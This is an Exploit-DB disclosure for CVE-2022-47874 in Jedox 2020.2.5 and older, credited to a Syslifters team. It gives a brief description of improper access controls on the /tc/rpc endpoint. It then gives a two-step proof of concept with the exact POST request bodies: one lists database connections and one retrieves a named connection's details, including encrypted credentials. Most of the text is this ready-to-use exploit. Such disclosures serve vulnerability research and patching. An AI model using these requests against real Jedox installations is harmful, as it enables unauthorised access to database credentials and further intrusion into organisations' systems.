Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls

EDB-ID:

51428




Platform:

PHP

Date:

2023-05-05


# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874


Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.


Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.


Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):

	PATH: /be/rpc.php
	METHOD: POST
	BODY:
	[
		[
			"conn",
			"ls",
			[
				null,
				false,
				true,
				[
					"type",
					"active",
					"description"
				]
			]
		]
	]

2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:

	PATH: /tc/rpc
	METHOD: POST
	BODY:
	[
		[
			"com.jedox.etl.mngr.Connections",
			"getGlobalConnection",
			[
				"<CONNECTION>"
			]
		]
	]